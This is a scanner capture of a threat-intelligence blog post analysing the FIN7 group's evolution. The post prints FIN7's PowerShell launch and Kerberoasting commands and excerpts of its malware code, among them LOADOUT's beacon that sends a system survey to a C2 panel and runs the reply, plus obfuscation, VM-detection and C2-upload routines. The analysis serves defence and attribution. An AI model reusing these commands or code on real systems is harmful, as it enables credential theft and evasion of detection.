www.mandiant.com
Open in
urlscan Pro
2606:4700:300b::a29f:f17d
Public Scan
URL:
https://www.mandiant.com/resources/evolution-of-fin7
Submission: On May 04 via api from US — Scanned from DE
Submission: On May 04 via api from US — Scanned from DE
Form analysis 2 forms found in the DOM
GET /search
<form action="/search" method="get">
<div class="js-form-item form-item js-form-type-textfield form-item-search js-form-item-search">
<label class="visually-hidden" for="edit-search">Search</label>
<input data-drupal-selector="edit-search" type="text" id="edit-search" name="search" value="" size="30" maxlength="128" class="form-text" placeholder="Search">
</div>
<div data-drupal-selector="edit-actions" class="form-actions js-form-wrapper form-wrapper" id="edit-actions">
<button data-drupal-selector="edit-submit-acquia-search" type="submit" id="edit-submit-acquia-search" class="button js-form-submit form-submit">
<span class="visually-hidden">Submit search form</span>
<svg width="16" height="17" viewBox="0 0 16 17" fill="none" xmlns="http://www.w3.org/2000/svg" aria-hidden="true">
<path d="M7.22574 13.9446C10.6622 13.9446 13.4481 11.1588 13.4481 7.72232C13.4481 4.28583 10.6622 1.5 7.22574 1.5C3.78925 1.5 1.00342 4.28583 1.00342 7.72232C1.00342 11.1588 3.78925 13.9446 7.22574 13.9446Z" stroke="currentColor"
stroke-width="2" stroke-linecap="round" stroke-linejoin="round"></path>
<path d="M15.0001 15.4996L11.6167 12.1162" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"></path>
</svg>
</button>
</div>
</form>GET /search
<form action="/search" method="get">
<div class="js-form-item form-item js-form-type-textfield form-item-search js-form-item-search">
<label class="visually-hidden" for="edit-search">Search</label>
<input data-drupal-selector="edit-search" type="text" id="edit-search" name="search" value="" size="30" maxlength="128" class="form-text" placeholder="Search">
</div>
<div data-drupal-selector="edit-actions" class="form-actions js-form-wrapper form-wrapper" id="edit-actions">
<button data-drupal-selector="edit-submit-acquia-search" type="submit" id="edit-submit-acquia-search" class="button js-form-submit form-submit">
<span class="visually-hidden">Submit search form</span>
<svg width="16" height="17" viewBox="0 0 16 17" fill="none" xmlns="http://www.w3.org/2000/svg" aria-hidden="true">
<path d="M7.22574 13.9446C10.6622 13.9446 13.4481 11.1588 13.4481 7.72232C13.4481 4.28583 10.6622 1.5 7.22574 1.5C3.78925 1.5 1.00342 4.28583 1.00342 7.72232C1.00342 11.1588 3.78925 13.9446 7.22574 13.9446Z" stroke="currentColor"
stroke-width="2" stroke-linecap="round" stroke-linejoin="round"></path>
<path d="M15.0001 15.4996L11.6167 12.1162" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"></path>
</svg>
</button>
</div>
</form>Text Content
Skip to main content
Mandiant has created a task force & initiated a Global Event to track the
Russian invasion of Ukraine. Visit the Ukraine Crisis Resource Center to learn
more.
×
* Platform
MANDIANT ADVANTAGE
Multi-vendor XDR platform that delivers expertise and frontline intelligence
to security teams of all sizes.
Platform overview
PLATFORM MENU
* Automated Defense close_fullscreen
Rapid event investigation & remediation
* Attack Surface Management map
Fully map your entire environment
* Security Validation layers
Validate controls are working properly
* Threat Intelligence sensors
Integrate latest intel from the frontlines
* Managed Defense how_to_reg
Amplify your team with Mandiant experts
Get started for freeRegister for Mandiant Advantage Threat intelligence
* Solutions
MANDIANT SOLUTIONS
Solve your toughest cyber security challenges with use-case and
industry-focused combinations of our products and services.
SOLUTIONS MENU
* Ransomware
Increase resilience against multifaceted extortion
* Industrial Controls & Infrastructure
Reduce security vulnerabilities in IC environments
* Cyber Risk Management
Advance your business approach to cyber security
* Insider Threats
Uncover and manage insider threats
* Intelligence
* Services
MANDIANT SERVICES
Mitigate threats, reduce risk and get back to business with the help of
experts!
Learn more
SERVICES MENU
* Featured Consulting Solutions
* Cyber Defense Transformation content_copy
Properly establish cyber defenses
* Incident Response notifications
Tackle breaches confidently
* Strategic Readiness health_and_safety
Increase resilience to risk
* Technical Assurance moving
Test your security program
* View all services (47)
* Training
* Find a Course menu
Browse on-demand and live training
* Mandiant Academy auto_stories
Train your teams to protect effectively
Schedule a consultationGet in touch with a Mandiant expert
* Resources
RESOURCE
* Mandiant Blog note_alt
Expert perspectives and industry news.
* Podcasts mic
Interviews, hot topics, and more
* Customer Stories check_box
Case studies and customer testimonials.
* Reports description
Research from the frontlines
* Webinars play_circle
Pre-recorded or livestreamed speaker events
* Insights help_outline
Cyber security concepts, methods, etc.
* Events location_on
Conferences and collaborative events
newM-Trends 2022: Cyber Security Metrics, Insights and Guidance From the
FrontlinesLearn More
View all resources
* Company
COMPANY
Learn more about us and our mission to help organizations defend against
cyber crime.
About Mandiant
COMPANY MENU
* Careers check_box
Life at Mandiant and open roles
* Investor Relations mic
Financial and shareholder information
* Media Center play_circle
News, reporting and research
* Partners text_snippet
Partners ecosystem and resources
* Leadership person
Learn more about the executive team
* Elevate groups
* Create a free account
* Sign in to Advantage
en expand_more
* English
* Français
* Deutsch
* 日本
* 한국어
* Español
Start for Free
Search
Submit search form
Search
Submit search form
* Platform
* Mandiant Advantage Overview
* Automated Defense
* Security Validation
* Attack Surface Management
* Threat Intelligence
* Managed Defense
* Solutions
* Solutions Overview
* Ransomware
* Industrial Controls & Infrastructure
* Cyber Risk Management
* Insider Threats
* Intelligence
* Services
* Services Overview
* Incident Response
* Strategic Readiness
* Cyber Defense Transformation
* Technical Assurance
* View all services
* Mandiant Academy
* Find a Course
* Resources
* Resources
* Mandiant Blogs
* Customer Stories
* Webinars
* Events
* Podcasts
* Reports
* Insights
* Company
* About Mandiant
* Careers
* Media Center
* Leadership
* Investor Relations
* Partners
* Elevate
* Mandiant Gives Back
* Mobile Footer Section
* See what’s new at Mandiant
* Get started
* Incident Response Help
* Contact Sales
* Support
* Sign In
* Create a Free Mandiant Advantage Account
TOP
* Incident Response
* Contact sales
* Support
* Advantage Free Trial
* Support
* Contact us
* report_problemIncident Response Assistance
BREADCRUMB
1. Home
2. Resources
3. FIN7 Power Hour: Adversary Archaeology and the Evolution of FIN7
Blog
FIN7 POWER HOUR: ADVERSARY ARCHAEOLOGY AND THE EVOLUTION OF FIN7
Bryce Abdo, Zander Work, Ioana Teaca, Brendan McKeague
Apr 04, 2022
25 mins read
Threat Research
Financial Threat Groups (FIN Groups)
Threat Intelligence
Recent public research asserts threat groups sharing overlaps with FIN7
transitioned to targeted ransomware operations involving REVIL, DARKSIDE,
BLACKMATTER, and ALPHV ransomware. With the purported shift to ransomware
operations, Mandiant is publishing our research on the evolution of FIN7 which
we haven’t publicly written about since Mahalo FIN7, published in 2019.
This blog post draws on organic research from both historical and recent
intrusions that Mandiant directly investigated, and describes the process of
merging multiple UNC groups into FIN7. This process allowed us to merge eight
previously suspected UNC groups into FIN7 in January 2022. We also highlight
notable shifts in FIN7 activity over this time, including their use of novel
malware, incorporation of new initial access vectors, and likely shift in
monetization strategies.
* FIN7 continued to leverage PowerShell throughout their intrusions, including
in a new backdoor called POWERPLANT, which FIN7 has continually developed
over the last two years. We also identified new versions of the BIRDWATCH
downloader being developed, which are tracked as CROWVIEW and FOWLGAZE.
* FIN7’s initial access techniques have diversified to include software supply
chain compromise and the use of stolen credentials, in addition to their
traditional phishing techniques. We also observed FIN7 use POWERPLANT as
their first stage malware instead of LOADOUT and/or GRIFFON in newer
intrusions.
* Data theft extortion or ransomware deployment following FIN7-attributed
activity at multiple organizations, as well as technical overlaps, suggests
that FIN7 actors have been associated with various ransomware operations over
time.
* Mandiant is also tracking multiple, notable campaigns as separate UNC groups
that we suspect are FIN7, including a “BadUSB” campaign leading to
DICELOADER, and multiple phishing campaigns leveraging cloud marketing
platforms leading to BIRDWATCH.
We first disclosed threat reporting and publicized research on FIN7 in 2017.
Since then, we’ve published multiple blog posts on FIN7 operations, with more
extensive content available on Mandiant Advantage. In this blog post, we focus
on examining the most recent FIN7 intrusion operations, as well as the
attribution methodologies that we used.
THREAT ATTRIBUTION OVER TIME
Our attribution methodology requires multiple layers of overlaps within
collected threat data to merge suspected FIN7 UNC groups into our core FIN7
cluster. Merge evidence is sourced from analysis of attacker infrastructure,
intrusion tradecraft, modus operandi, and how specific code is employed by the
groups we research. Rigorous documentation of technical evidence is critical for
modern cybercrime attribution, when considering the fluid and opportunistic
nature of cybercriminal operations, as well as individual operators’ narrow
allegiances to criminal organizations. It is also common for us to observe
multiple threat groups engaging in intrusion operations within close temporal
proximity, sometimes even using the same access method within hours or minutes
of each other. This is especially notable in the ransomware ecosystem, where
Mandiant has observed individual members shift teams, and teams migrate between
affiliate programs commonly adopting different TTPs across intrusions depending
on who they are collaborating with or gaining access from at a given time.
To date, we suspect 17 additional UNCs of being affiliated with FIN7 with
varying levels of confidence; however, those groups have not been formally
merged into FIN7. Those groups’ activity spans as far back as 2015 and as
recently as late 2021, across 36 separate intrusions. Eight previously suspected
FIN7 UNC groups, active since 2020, have recently been merged into FIN7,
confirming the resilience of actors associated with the threat group.
2020 ACTIVITY BRIEF: HEAVY ON THE LOADOUT
FIN7 was active during the spring and summer of 2020, conducting phishing
campaigns and attempting to distribute LOADOUT and GRIFFON. During that time,
five UNC groups were created to track various campaigns, which eventually were
merged into our new splinter group of FIN7, following merge analysis later in
2021 that expanded our understanding of FIN7. The impacts of related UNC merges
for 2020 activity added usage of code families LOADOUT, TAKEOUT and a BIRDWATCH
variant into FIN7.
Figure 1: FIN7 Activity in 2020-2021
LOADOUT is an obfuscated VBScript-based downloader which harvests extensive
information from the infected system. The harvested information is then sent to
a command-and-control (C2) server. C2 server responses for LOADOUT infections
delivered GRIFFON, a JavaScript-based downloader which retrieves additional
JavaScript modules using HTTP or DNS and executes them in memory.
In late summer of 2020, FIN7 capped off their busy year with the first observed
usage of POWERPLANT. POWERPLANT, also referred to as “KillACK”, is a
PowerShell-based backdoor with a breadth of capabilities, initially delivered
following a successful GRIFFON infection in August 2020. Merges involving the
usage of POWERPLANT into 2021 led us to assess that FIN7 is likely the only
operator using POWERPLANT.
2021 ACTIVITY BRIEF: A SHIFT TO POWERPLANT
We identified an uptick in FIN7-suspected UNC group activity during 2021 across
five intrusions, beginning in April of 2021. The uptick led us to initiate a
deep-dive research effort into FIN7. We also observed FIN7 shift their initial
access techniques away from using LOADOUT, GRIFFON or CARBANAK in favor of
direct deployment of POWERPLANT and BEACON. Specifically, FIN7 used POWERPLANT
in all observed intrusions in 2021. FIN7 also relied on BEACON as a secondary
mode of access alongside some POWERPLANT infections.
Throughout 2021 we scrutinized a multitude of FIN7-linked UNC groups to our
breadth of past FIN7 intelligence holdings, merging multiple threat clusters
along the way. Our research revealed a fusion of older FIN7 intrusion
tradecraft, and new FIN7 malware.
POWERSHELL ARCHAEOLOGY: FIN7 HABITS DIE HARD
There is no doubt about it, PowerShell is FIN7’s love language. FIN7 has
implemented malware into its offensive operations using many programming
languages; however, during on-system interactions, FIN7’s preference for
boutique PowerShell-based loaders and unique PowerShell commands is dominant.
Our deep dive into prior FIN7 intrusions dating as far back as 2019 bubbled up
several long-standing patterns of unique PowerShell invocations still being used
today. In the first example, command lines, such as in Figure 2 and Figure 3,
had overall low-global prevalence outside of FIN7 and suspected FIN7 UNCs.
Figure 2: FIN7 PowerShell Execution from 2019 cmd.exe /c start
%SYSTEMROOT%\system32\WindowsPowerShell\v1.0\powershell.exe -noni -nop -exe
bypass -f <REDACTED>/ADMIN$/temp/wO9EBGmDqwdc.ps1
Figure 3: FIN7 PowerShell Execution from 2021 cmd.exe /c start
%SYSTEMROOT%\system32\WindowsPowerShell\v1.0\powershell.exe -noni -nop -exe
bypass -f \\<REDACTED>\Admin$\c5k3fsys.3bp.ps1
The unique aspect in the Figure 2 and Figure 3 commands is the distinct
parameters -noni -nop -exe bypass -f, for launching scripts located in Admin
shares and installing Windows services. Since 2019, we have observed FIN7 use
command line parameters such as these while interacting with victim systems
through backdoor malware such as CARBANAK. We have since seen a shift of some of
these distinct PowerShell commands being initiated through POWERPLANT
infections.
Smaller patterns and consistencies across FIN7 intrusions from 2019 and beyond
reveal more distinct PowerShell command lines using -ex bypass -f or -ex bypass
-file as passed parameters. Although those patterns appear modest to hunt for,
the combinations have extremely low global prevalence outside of FIN7-associated
threat activity. For example, the first command line pattern has been seen over
2800 times, all of which were events attributed to FIN7. The second command line
pattern has been seen nearly 250 separate times at 10 different victims as far
back as 2019, all of which were FIN7 attributed commands.
Figure 4: FIN7 PowerShell Execution from 2019
powershell.exe -ex bypass -file C:\windows\temp\fdddu32.ps1
Figure 5: FIN7 PowerShell Execution from 2020
powershell.exe -ex bypass -f c:\users\public\temp\AC-Win10w-x64.ps1
powershell.exe -ex bypass -f C:\Users\Public\Videos\AC-Bot-x64.ps1
Figure 6: FIN7 PowerShell Executions from 2021
powershell.exe -ex bypass -f pkit.ps1
powershell.exe -ex bypass -f cube.ps1
In addition to FIN7’s unique command lines during intrusion operations, we
identified long-standing usage of other PowerShell code families, such as
POWERTRASH. POWERTRASH is an in-memory dropper, or loader, written in PowerShell
that executes an embedded payload. Observed payloads loaded by FIN7’s POWERTRASH
include CARBANAK, DICELOADER, SUPERSOFT, BEACON and PILLOWMINT. POWERTRASH is a
uniquely obfuscated iteration of a shellcode invoker included in the PowerSploit
framework available on GitHub.
With this improved understanding of FIN7 intrusion operations, we assembled our
analytical efforts to begin merging multiple suspected UNCs into FIN7. As part
of this initiative, we identified new FIN7 missions targeting our customers,
including a Managed Defense Rapid Response engagement in 2021.
MANAGING A DEFENSE
FIN7 has targeted a broad spectrum of organizations in multiple industries,
including Software, Consulting, Financial Services, Medical Equipment, Cloud
Services, Media, Food and Beverage, Transportation, and Utilities. We identified
over a dozen intrusions attributed to FIN7 since 2020 across our client base.
The following use case profiles recent FIN7 tradecraft during a Mandiant Managed
Defense engagement in 2021.
FIN7 FROM THE TRENCHES
To obtain initial access during this intrusion, FIN7 used compromised Remote
Desktop Protocol (RDP) credentials to login to a target server across two
separate days, and initiated two similar Windows process chains (Figure 7).
Figure 7: Two FIN7 process event chains
rdpinit.exe
↳ notepad++.exe
↳ cmd.exe
↳ powershell.exe
rdpinit.exe
↳ notepad++.exe
↳ cmd.exe
↳ rundll32.exe
FIN7 used established RDP access to eventually install other modes of host
control, first by executing PowerShell reconnaissance scripts, then by executing
a TERMITE loader (Figure 8).
Figure 8: Command line used to load FIN7 TERMITE
RunDll32 TstDll.dll,TstSec 11985756
TERMITE is a password-protected shellcode loader which we have observed at least
seven distinct threat groups use to load BEACON, METASPLOIT, and BUGHATCH
shellcodes. FIN7 used TERMITE to load and execute a shellcode stager for Cobalt
Strike BEACON in this case.
Following secondary access of BEACON, FIN7 began further enumeration using
built-in Windows commands as well as POWERSPLOIT and Kerberoasting PowerShell
modules.
cmd.exe /C net group "Domain Admins" /domain
cmd.exe /C quser
powershell.exe -c import-module C:\Users\Public\kerberoast_hex.ps1;
Invoke-Kerberoast -OutputFormat HashCat > hash.txt
powershell.exe -ex bypass -c import-module C:\Users\Public\kerberoast_hex.ps1;
Invoke-Kerberoast -OutputFormat HashCat
powershell.exe -ex bypass -f pkit.ps1
After the initial reconnaissance using RDP and BEACON, FIN7 executed an
obfuscated loader for a victim-customized variant of the PowerShell-based
backdoor POWERPLANT, providing tertiary access:
powershell.exe -ex bypass -f cube.ps1
FIN7 then attempted to steal credentials and further compromise the victims’
environment with limited success, as the client was able to respond and quickly
remediate with the advantage of Managed Defense responders.
A unique aspect of this specific intrusion perfectly highlighted the challenges
of technical attribution for cybercriminal threats: Between the two days of FIN7
operations on the victim system, FIN12 was also active on the same victim for
multiple hours using the same RDP account, but much different infrastructure and
tradecraft, attempting to install BEACON using the WEIRDLOOP in-memory dropper
before the intrusion was remediated.
FIN7’S EVASION
Among FIN7’s historical trademarks were their creative obfuscation and fast
development of evasive techniques. This is still the case, with FIN7 first stage
droppers and downloaders being heavily obfuscated. LOADOUT in particular, due to
its wide distribution in opportunistic campaigns, has been through several
iterations meant to improve evasion.
The initial obfuscation mechanism was basic but effective at evading static
detections: the malicious code was interspersed with random junk code (Figure
9). After a few months of successful campaigning, AV detection engines improved
coverage of the downloader. To get around this, and to send a message, LOADOUT
developer(s) broke up the beacon suspected to be used in detection signatures by
simply inserting “FUCKAV” into the strings (Figure 8).
Figure 8: System survey information sent as beacon by LOADOUT
data = "id=" & get_id() & "&FUCKAVtype=put" & get_computer_info("") &
"&DomainHosts=" & count_domain_hosts() & "&UserName=" & usFUCKAVername &
"&LogicalDrives=" & get_grivers() &
"&SystemInfo=nothing&SoftwareInfo=nothing&NetworkInfo=nothingFUCKAV&ProcessList="
& get_processlist() & "&DesktopFileList=" & get_desktopfiles() &
"&DesktopScreenshFUCKAVot=nothing&WebHistory=nothing&stype=vbs"
response = send(panel_url, data)
if response = "okFUCKAV" then
js = send(panel_url, "")
run_js(js)
end ifFUCKAV
Figure 9: LOADOUT obfuscation
kiki=ado.ReadText
' OE5QAJ2VaFCK F5
Dim yiups
yiups = "UTo"
WScript.Echo(" error ")
kok = replace(kiki, "FUCKAV", "")
ulpo = "12"
aoso = year("01/07/12")
if right(aoso, 2) = ulpo then
execute("WScript.Echo("" file is corrupted ""):" & kok)
end if
'hello bitchw
Indeed, the developer(s) was correct to be suspicious that these strings were
being used for detection. By pivoting on the beacon, we discovered a new,
work-in-progress variant of LOADOUT submitted to VirusTotal (MD5:
485b2a920f3b5ae7cfad93a4120ec20d), detected by only one engine (Figure 10). Two
hours later, a new version was submitted (MD5:
012e7b4d6b5cb8d46771852c66c71d6d), this time with the offending PowerShell
command obscured through their custom obfuscation mechanism (Figure 11).
Figure 10: PowerShell command before obfuscation
objTS.WriteLine(TextCrypt)
objTS.Close
pwsh_command = "powershell.exe -executionpolicy bypass -file " & FileName &
".ps1"
objWSH.Run pwsh_command, 0, True
FSO.DeleteFile FileName & ".ps1"
Figure 11: PowerShell command obfuscation
Text1 =
"/3/3.1/2.1,7/2/2.0/3+4+5/4/2*3,7.0,7/2/2.1/4.0,6/3/3.0/3.0+5/4+5-9/4.1+5/4/3*3,7.0,6/3/2*3272327272412292326241618252310112117262125222518252429242516
261416272214202710112212232310"
TextCrypt = Encryption(MakeCryptoText(TextUnShifter(Text1)),
False)
pwsh_command = TextCrypt & FileName & ".ps1"
objWSH.Run pwsh_command, 0, True
FSO.DeleteFile FileName & ".ps1"
FIN7 actors have historically tested their tools against public repositories to
check static detection engine coverage. It is likely that in this case, they
were testing the strength of their custom obfuscation.
This new and improved version of LOADOUT emerged five months later. It was
refactored to add multiple layers of obfuscation, including interspersed Bible
verses as filler text, and string obfuscation through a custom mechanism (Figure
12).
Figure 12: LOADOUT custom string obfuscation
Private Function GetShiftKey()
On Error Resume Next
Set Key = CreateObject("Scripting.Dictionary")
l = Len(CryptoKey)
i1 = 0
With Key
For i = 1 To l
s = Mid(CryptoKey, i, 1)
n = (Asc(s) Mod 8) + 1
If Not .Exists(n) Then
.Add n, n
i1 = i1 + 1
End If
If i1 = 9 Then Exit For
Next
If i >= l And i1 < 9 Then
For i = 1 + 1 To 8
If Not .Exists(i) Then
.Add i, i
End If
Next
End If
For i = 1 To 8
GetShiftKey = GetShiftKey + .Items()(i)
Next
End With
End Function
Private Function TextShifter(txt)
Dim nKeys(), out()
Key = GetShiftKey
n = Len(Key)
If n = 0 Then Exit Function
l = Len(txt)
m = -Int(-l / n)
ReDim nKeys(n)
For i = 1 To n
s1 = Mid(Key, i, 1)
For j = 1 To n
s2 = Mid(Key, j, 1)
If s1 > s2 Or (s1 = s2 And j <= i) Then
nKeys(i) = nKeys(i) + 1
End If
Next
Next
ReDim out(n * m)
For i = 1 To Len(txt)
out(nKeys((i - 1) Mod n + 1) * m + (i - 1) \ n - m + 1) = Mid(txt, i, 1)
Next
TextShifter = Join(out, "")
End Function
POWERPLANT: FIN7’S POWERSHELL WORKHORSE
FIN7 has leveraged multiple methods of initial and secondary access into victim
networks including phishing, compromising third-party systems, Atera agent
installers, GoToAssist, and RDP. In a recent case, FIN7 actors compromised a
website that sells digital products and modified multiple download links to
point to an Amazon S3 bucket hosting trojanized versions, containing an Atera
agent installer. This remote management tool was later used to deploy POWERPLANT
to the victim system. This was the first time Mandiant observed FIN7 leverage
supply chain compromise. FIN7’s time-tested CARBANAK and DICELOADER (also known
as Lizar) malware continue to be in use; however, we have noticed FIN7 depend
more on the POWERPLANT backdoor during recent intrusions.
Our research into POWERPLANT has revealed that it is a vast backdoor framework
with a breadth of capabilities, depending on which modules are delivered from
the C2 server. POWERPLANT backdoors contain internal version identifiers within
the code. We have identified samples ranging from version “0.012” through
“0.028”, with examples shown in Table 1.
Table 1: POWERPLANT samples
POWERPLANT Sample MD5
Version
5a6bbcc1e44d3a612222df5238f5e7a8
0.012
0291df4f7303775225c4044c8f054360
0.016
3803c82c1b2e28e3e6cca3ca73e6cce7
0.019
d1d8902b499b5938404f8cece2918d3d
0.021(TLS1)
833ae560a2347d5daf05d1f670a40c54
0.021b(SVC)
edb1f62230123abf88231fc1a7190b60
0.021c(SVC)
bce9b919fa97e2429d14f255acfb18b4
0.022
b637d33dbb951e7ad7fa198cbc9f78bc
0.025
2cbb015d4c579e464d157faa16994f86
0.028
The rate of increase in these internal version numbers over time suggests that
FIN7 is actively developing POWERPLANT (Figure 13). In one engagement, we
observed FIN7 deploy incremented versions of POWERPLANT with tweaked
functionality to targets in the middle of intrusion operations. During that
engagement, versions “0.023” and “0.025” were both used within a 10-minute
timeframe. Each version we have identified implements overall similar
functionality with some programmatic improvements and features added over time.
Figure 13: POWERPLANT version numbers
Mandiant also recovered portions of server-side code components from POWERPLANT
controllers. Some of these components contain clues that hint at the operational
security mindfulness of the malware’s developers. Two such examples are FIN7
being aware of researchers investigating their infrastructure, and employing
capabilities to ban target host aspects such as usernames from the panel.
Figure 14: Snippet of functions from POWERPLANT Server Settings
check_username
check_hostdomain
check_hostname
check_hosts
check_researcher
check_desktop
Figure 15: Snippet of functions from POWERPLANT Server Settings
if (res) {
localStorage.setItem('success-add-username',
'success-add-username-to-blacklist');
location.reload();
}
},
Figure 16: Snippet of functions from POWERPLANT Server Configuration
/**
* Инициализация
*/
init() {
this.config();
this.events();
},
/**
* Конфиги
*/
config() {
this.config = {
window: $(window),
document: $(document),
content: $('#content'),
lastUrl: null,
isPage: true,
isModal: false,
intervalId: null,
timer: null,
selectedBots: []
};
}
During active C2 sessions, POWERPLANT servers will send multiple additional
module types as “tasks” for target systems to execute. Two of these modules are
EASYLOOK and BOATLAUNCH.
EASYLOOK MODULE
EASYLOOK is a reconnaissance utility that FIN7 has used since at least 2019.
EASYLOOK captures a wide range of data from infected systems, including
operating system version, registration key, system name, username, domain
information, and hardware specifications.
The initial version of EASYLOOK was delivered by a GRIFFON C2 server and written
in JScript (Figure 18). FIN7’s updated variation of EASYLOOK was delivered by a
POWERPLANT variant C2 server and written in PowerShell (Figure 17). Both
versions implemented the exact same functionality across two code languages,
including the typo “bios_versoin”.
Figure 17: VM check from new variant of FIN7 EASYLOOK coded in PowerShell
function is_wm {
$bios = Get-WMIObject Win32_Bios
$SerialNumber = $bios.SerialNumber
$bios_versoin = $bios.SMBIOSBIOSVersion
If ($SerialNumber.Contains("parallels") -or $SerialNumber.Contains("vmware")) {
return $true
}
If ($bios_versoin.Contains("vmware") -or $bios_versoin.Contains("virtualbox")) {
return $true
}
return $false
}
Figure 18: VM check from first variant of FIN7 EASYLOOK coded in JavaScript
function is_vm () {
var biosRequest = wmi.ExecQuery('SELECT * FROM Win32_BIOS');
var biosItems = new Enumerator(biosRequest);
for (; !biosItems.atEnd(); biosItems.moveNext()) {
var bios_versoin = biosItems.item().SMBIOSBIOSVersion.toLowerCase();
var serial_number = biosItems.item().SerialNumber.toLowerCase();
if(serial_number.indexOf('parallels') >= 0 ||
serial_number.indexOf('vmware') >= 0) {
return true;
}
if(bios_versoin.indexOf('vmware') >= 0 ||
bios_versoin.indexOf('virtualbox') >= 0) {
return true;
}
}
return false;
}
BOATLAUNCH MODULE
BOATLAUNCH is a utility sent from FIN7 POWERPLANT controllers that is used as a
helper module during intrusion operations. BOATLAUNCH is used to patch
PowerShell processes on infected systems to bypass Windows AntiMalware Scan
Interface (AMSI). The malware loops, looking for unpatched PowerShell processes,
and for each unpatched process the malware locates and patches
amsi.dll!AmsiScanBuffer with a 5-byte instruction sequence to always return
S_OK.
The technique used to patch AMSI is a variation of publicly described common
AMSI bypass techniques. Both 32bit and 64bit variants of BOATLAUNCH have been
observed using the following export directory DLL names (Table 2).
Table 2: BOATLAUNCH PE Export Directory Names
BOATLAUNCH Bitness
Export Directory Name
32-bit
amsi32_kill.dll
64-bit
amsi64_kill.dll
THE CURIOUS CASES OF BIRDWATCH
Our deep dive also revealed usage of BIRDWATCH and its’ similar variants used by
FIN7 and suspected FIN7 groups such as UNC3381. BIRDWATCH is a .NET-based
downloader which retrieves payloads over HTTP, writing them to disk and then
executing them. BIRDWATCH uploads reconnaissance information from targeted
systems as well, which includes running processes, software installed, network
configuration, web browser information and active directory data.
BIRDWATCH is often referred to collectively as “JssLoader”; however, multiple
variations of BIRDWATCH exist which we track as separate code families. One
variant of BIRDWATCH is CROWVIEW, which is also .NET-based, but has enough code
differences from prototypical BIRDWATCH that we cluster it separately. Unlike
BIRDWATCH, CROWVIEW can house an embedded payload, can self-delete, supports
additional arguments and stores a slightly different configuration.
FIN7 has implemented similar or exact functionality in different programming
languages, observed in various code families several times over the past few
years. Similar to EASYLOOK, which has both JScript and PowerShell variants,
BIRDWATCH and CROWVIEW have separate versions implemented in C++. This data
point of code reuse and overlaps aided our technical attribution throughout
multiple UNC merges, when combined with additional infrastructure and tradecraft
analysis.
In this first example, programmatic collection of the BIOS (Basic Input Output
System) serial number is shown across POWERPLANT and CROWVIEW code families.
Figure 19: C# Code Snippet from FIN7-attributed CROWVIEW, a variant of BIRDWATCH
private static string GetBiosSerial()
{
string result = "BIOS UNKNOWN";
try
{
ManagementObjectSearcher
managementObjectSearcher = new ManagementObjectSearcher("SELECT SerialNumber
FROM Win32_BIOS");
ManagementObjectCollection
managementObjectCollection = managementObjectSearcher.Get();
foreach (ManagementBaseObject
managementBaseObject in managementObjectCollection)
{
ManagementObject
managementObject = (ManagementObject)managementBaseObject;
result =
(string)managementObject["SerialNumber"];
}
}
catch
{
}
return result;
}
Figure 20: PowerShell Code Snippet from FIN7-attributed POWERPLANT
function Get-BiosSerial() {
$sn = "BIOS UNKNOWN"
$_sn = ""
try {
$mSearcher = Get-WmiObject -Query "SELECT SerialNumber FROM Win32_BIOS"
foreach ($o in $mSearcher) {
if ($o.Properties.Name -eq "SerialNumber") {
$_sn = $o.Properties.Value
}
}
}
catch {}
if ([String]::IsNullOrEmpty($_sn) -eq $false) { $sn = $_sn }
return "$sn";
}
System enumeration data formatting overlaps also exist between FOWLGAZE and
EASYLOOK. Both code families implement near identical system surveys, with the
shared usage of keys such as “pc_domain”, “pc_dns_host_name”, “pc_model” and
“no_ad”.
Figure 21: Data Collection JSON Format Snippet of FOWLGAZE("JssLoader")
{"host":"<HOSTNAME>", "domain": "<DOMAIN>", "user":"<USERNAME>", "processes":
[<PROCESS_LIST>] ,"desktop_file_list": [<FILE_LIST>] ,"adinfo":
{"adinformation":"no_ad", "part_of_domain":"no", "pc_domain":"",
"pc_dns_host_name":"", "pc_model":""}}
Figure 22: Data Collection Code Snippet of EASYLOOK (Reconnaissance Module)
$result += ('username***' + $env:USERNAME)
$result += ('hostname***' + $env:COMPUTERNAME)
$elevated = $(whoami /groups).Contains("12288")
If ($elevated) {
$result += 'yes'
}
Else {
$result += 'elevated***' + 'no'
}
$ad = get_active_directory_information
if ($ad) {
$result += ('adinformation***' + $ad)
} else {
$result += ('adinformation***no_ad')
}
$csRequest = Get-WmiObject Win32_ComputerSystem
$csRequest.PartOfDomain
If ($csRequest.PartOfDomain) {
$result += ('part_of_domain***yes')
}
else {
$result += ('part_of_domain***no')
}
$result += 'pc_domain***' + $csRequest.Domain
$result += 'pc_dns_host_name***' + $csRequest.DNSHostName
$result += 'pc_model***' + $csRequest.Model
A final code reuse example is usage of "theAnswer", defined as variable within
program functionality of POST requests to C2 controllers for both CROWVIEW and
POWERPLANT, as shown in Figure 23 and Figure 24.
Figure 23: C# Code Snippet from FIN7-attributed CROWVIEW and BIRDWATCH
(JssLoader)
public void Put(string theAnswer)
{
AppHttp.wCli.QueryString.Clear();
AppHttp.wCli.QueryString.Add("type", "put");
string text =
Convert.ToBase64String(Encoding.ASCII.GetBytes(AppParams.ProgID)).Replace("+",
"***");
string text2 =
Convert.ToBase64String(Encoding.ASCII.GetBytes("put")).Replace("+", "***");
string body = string.Concat(new string[]
{
"id^^^",
text,
"&type^^^",
text2,
"&",
theAnswer
});
string text3 = this.HttpUpload(AppParams.URL_PutAnswer, body);
}
Figure 24: PowerShell Code Snippet from FIN7-attributed POWERPLANT
Function Send-ToConsole([String] $theAnswer) {
if ([String]::IsNullOrEmpty($theAnswer)) { return }
$_rc = ""
try {
$_wc = New-Object System.Net.WebClient
$_wc.QueryString.Add("id", $script:myID)
$_wc.Headers.Add("Content-type", "text/html")
$_wc.Headers.Add("Accept", "text/html")
$_rc = $_wc.UploadString($urlConsole, $theAnswer)
Malware code usage is sometimes considered a primary data point for some public
threat attribution. Code overlaps by themselves, without sufficient additional
data points such as intrusion data and infrastructure, are not strong enough for
us to fully assess that an UNC group should be merged. Throughout 2021 and well
into 2022, we have identified and will continue to track multiple newly
suspected FIN7 UNCs and their activity moving forward.
ADDITIONAL RECENT ACTIVITY FROM SUSPECTED FIN7 UNCS
In October 2021, Mandiant observed a campaign where actors mailed victim
organizations “BadUSB” malicious USB devices, primarily targeting U.S.-based
organizations. We attribute this campaign to UNC3319, a group which we suspect
to be associated with FIN7 with low confidence.
The USB hardware was programmed to download STONEBOAT, which ultimately
installed the DICELOADER framework on the victim system. STONEBOAT is a
previously unseen, .NET-based in-memory dropper which decrypts a shellcode
